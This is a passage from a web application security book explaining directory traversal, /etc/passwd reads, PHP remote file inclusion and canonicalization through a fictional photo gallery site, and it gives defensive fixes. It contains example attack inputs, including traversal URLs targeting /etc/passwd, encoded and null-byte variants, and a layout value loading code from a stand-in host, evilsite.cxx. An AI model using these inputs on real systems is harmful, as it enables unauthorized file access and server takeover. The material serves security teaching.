Directory Traversal

Search in book...
Toggle Font Controls
Create new playlist

Name your new playlist

Playlist description (optional)
Sign In

Email address

Password

Forgot Password?

or

Continue with Facebook

Continue with Google
Sign Up

Full Name

Email address

Confirm Email Address

Password

or

Continue with Facebook

Continue with Google

Directory Traversal

Virtually every web application attack works on a premise of “tricking” the web application into performing an action that the attacker is unable to directly perform himself. An attacker can’t normally directly access an application’s database, but he can trick the web application into doing it for him through SQL injection attacks. He can’t normally access other users’ accounts, but he can trick the web application into doing it for him through cross-site scripting attacks. And he can’t normally access the file system on a web application server, but he can trick the application into doing it for him through directory traversal attacks. To show an example of directory traversal, let’s return one more time to Dave’s photo gallery site.

The main page for www.photos.cxx where users go to see Dave’s pictures is the page view_photo.php. The particular picture that gets displayed to the user is passed in the URL parameter “picfile,” like this: www.photos.cxx/view_photo.php?picfile=mt_rainier.jpg. Normally a user wouldn’t type this address in himself—he would just follow a link from the main gallery page that looks like this:

An attacker may be able to manually change the picfile parameter to manipulate the web application into opening and displaying files outside its normal image file directory, like this: http://www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg. This is called a directory traversal or path traversal attack. In this case, the attacker is attempting to break out of the internal folder where Dave keeps his photos and into a guessed “private” folder. The “../” prefix is a file system directive to “go up” one folder, so the folder “images/public/../private” is really the same folder as “images/private.” This is why you’ll occasionally hear directory traversal attacks called “dot-dot-slash” attacks.

Directory traversal attacks are similar to forceful browsing in that the attacker is attempting to break out of the intended scope of the application and access files he’s not supposed to be able to. In fact, some web application security experts consider directory traversal to be another subcategory of forceful browsing attacks like filename guessing or directory enumeration.

IMHO

If you want to think of directory traversal attacks this way, I think that’s fine, but personally I think there’s a big enough distinction between them based on the fact that forceful browsing issues are generally web server issues that can be mitigated through appropriate web server configuration; while directory traversal attacks are generally web application issues that need to be fixed through application code changes.

Applications may also be vulnerable to directory traversal vulnerabilities through attacks that encode the directory escape directory. Instead of trying the attack string “../private/cancun.jpg,” an attacker might try the UTF-8 encoded variation “%2E%2E %2Fprivate%2Fcancun%2Ejpg.” This is a type of canonicalization attack—trying an alternative but equivalent name for the targeted resource—and we’ll cover these attacks in more detail later in this chapter.

etc/passwd

The classic example of a directory traversal attack is an attempt to read the /etc/passwd user information file. Etc/passwd is a file found on some Unix-based operating systems that contains a list of all users on the system, their names, e-mail addresses, phone numbers, physical locations: a gold mine of data for a potential attacker.

Note

Even though its name implies otherwise, in modern systems /etc/passwd does not actually contain a list of users’ passwords. Early versions of Unix did work this way, but now passwords are kept in a separate, more secure file only accessible by the system root user.

One especially nice thing about /etc/password (from an attacker’s perspective) is not just that it has a lot of really interesting and potentially valuable data, it’s that there’s no guessing involved as to where the file is located on the server. It’s always the file “password” located in the directory “etc.” Retrieving this file (or any other standard system file always located in the same place) is a lot simpler than trying to blindly guess at files or directories that may not actually exist. The only question is, how far back in the directory structure is it? It may be 1 folder back: http://www.photos.cxx/view_photo.php?picfile=../etc/passwd; or it may be 2 folders back: http://www.photos.cxx/view_photo.php?picfile=../../etc/passwd; or it may be 20 folders back. But even if it is 20 folders back, that’s still a lot fewer guesses than an attacker would need to find something like www.photos.cxx/view_photo.php?picfile=../private/cancun.jpg.

More Directory Traversal Vulnerabilities

Even though it’s bad enough that attackers can exploit directory traversal vulnerabilities to read other users’ confidential data and sensitive system files, there are other possibilities that may be even worse. Imagine what might happen if your web application opened a user-specified file in read-write mode instead of just read-only mode; for example, if you allowed the user to specify the location of a log file or user profile file. An attacker could then overwrite system files, either to crash the system entirely (causing a denial-of-service attack) or in a more subtle attack, to inject his own data. If he could make changes to /etc/passwd, he might be able to add himself as a full-fledged system user. If he could determine the location of the application’s database (for instance, if the database connection string were accidentally leaked in a code comment as discussed earlier), then he could make changes to the database directly without having to mess around with complex SQL injection attacks. The possibilities are almost endless.

This attack isn’t as farfetched as it might seem, especially if you consider that a web application might easily look for a user profile filename in a cookie and not necessarily in the URL query string.

Tip

Always remember that every part of an HTTP request, including the URL query string, the request body text, headers, and cookies can all be changed by an attacker with an HTTP proxy tool.

File Inclusion Attacks

One exceptionally nasty variant of directory traversal is the file inclusion attack. In this attack, the attacker is able to specify a file to be included as part of the target page’s server-side code. This vulnerability is most often seen in PHP code that uses the “include” or “require” functions, but it’s possible to have the same issue in many different languages and frameworks. Here’s an example of some vulnerable code.

Dave is having great success with the new print purchase feature of his photo gallery application (with the exception of a few security breaches that he’s trying to take care of). In order to better serve his customers who are visiting his site with iPhones and Androids, he adds two radio buttons to the main page to allow the user to choose between the full-fledged regular high-bandwidth user interface, or a simpler reduced-bandwidth interface:

In the PHP code, Dave gets the incoming value of the “layout” parameter and then loads that file into the page in order to execute that code and change the page’s layout behavior:

Of course this code is vulnerable to the same directory traversal attacks we’ve already discussed; an attacker could make a request for this page with the “layout” parameter set to ../../etc/password or any other system file. But there’s a much more serious possibility too. Instead of loading in system files, an attacker could specify his own PHP code from his own server by setting the layout parameter to http://evilsite.cxx/exploit.php. The server would then fetch this code and execute it. If this happens, the attacker would have complete control over the web server just as if he was one of the legitimate developers of the web site.

Into Action

It’s best to avoid including source code files based on user-specified filenames. If you must, try hard-coding a specific list of possibilities and letting users select by index rather than name, just as we did to avoid indirect direct object reference vulnerabilities we discussed in Chapter 7. So in this case, Dave would have been better off setting his radio button values to “0” and “1” (or something like that) and then writing PHP to load either “standard.php” when layout is equal to 0 or “simple.php” when layout is equal to 1.

If that’s not an option for you, you’ll need to canonicalize the filename value and test it before loading that resource. (We’ll talk about how to do this next.) Also, if you’re using PHP, you should also set the allow_url_fopen configuration setting to “Off,” which prohibits the application from loading external resources with the include or require functions.

Canonicalization

You like potato, and I like potahto
You like tomato, and I like tomahto
Potato, potahto, tomato, tomahto
Let’s call the whole thing off.
—Louis Armstrong

Human beings often have many different ways of referring to the exact same object. What I call an “elevator,” my British friend Mark might call a “lift.” What a botanist calls a “Narcissus papyraceus” I call a “daffodil,” and my wife Amy (having been raised in the South) calls a “jonquil.” (Our cat calls them delicious, as he does with all our other house plants.)

Web servers also often have many different ways of referring to the exact same file. To Dave’s photo gallery application, the page “http://www.photos.cxx/myfavoritepictures.html” is the same page as “http://www.photos.cxx/MYFAVORITEPICTURES.html” and the same page as “http://www.photos.cxx/My%20Favorite%20Pictures.html” too. It might also be “http://192.168.126.1/myfavoritepictures.html,” “./my favorite pictures.html,” or “c:inetpubwwwrootphotosmyfavo~1.htm.” If we were to list out all the possible combination variations of encodings, domain addresses, relative/absolute paths, and capitalization, there would probably be tens if not hundreds of thousands of different ways to refer to this one single file. Figure 8-9 shows an example of just a few of these possibilities, all pointing to the same file on the server.

Figure 8-9 Different filenames all resolving to the same file on the web server

What this means for us in terms of directory traversal attacks is that it’s pretty much impossible to prevent directory traversal attacks by testing for specific banned files or directories (also called blacklist testing). If you check to make sure the user isn’t trying to load “../etc/passwd”, that still means he can load “../ETC/PASSWD” or “../folder/../etc/ passwd” or “../etc/passwd%00” or many other variations that end up at the exact same file. Even checking to see whether the filename starts with “../” won’t work—maybe the attacker will just specify an absolute filename instead of a relative one.

The solution to the problem is to canonicalize the input value (that is, reduce it to a standard value) before testing it. The canonical representation of “http://www.photos.cxx/MyFavoritePictures.html” and “http://192.168.126.1/my%20favorite%20pictures.cxx” and all other possible variants of encodings and capitalizations and domain addresses might resolve to one single standard value of “http://www.photos.cxx/myfavoritepictures.cxx.” Only once a value has been properly canonicalized can you test it for correctness.

Tip

Canonicalization is tricky, so don’t try to come up with your own procedure for it. Use the built-in canonicalization functions provided by your application language and framework.

We’ve Covered

Keeping your source code secret

The difference between static and dynamic web content

The difference between interpreted and compiled source code

Backup file leakage and include file leakage

Keeping secrets out of publicly visible comments

Keeping sensitive functionality on the server tier

Security through obscurity

Obscuring information or functionality can enhance security

Never rely on obscurity alone

Forceful browsing

Guessed files and folders

Insecure direct object references

Directory enumeration

HTTP status code information leakage

Directory traversal

Reading sensitive data: /etc/password

Writing to unauthorized files

PHP file inclusion

Canonicalization

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.

Table of Contents for Directory Traversal

Create new playlist

Sign In

Sign Up

Directory Traversal

etc/passwd

More Directory Traversal Vulnerabilities

Canonicalization

Table of Contents for
Directory Traversal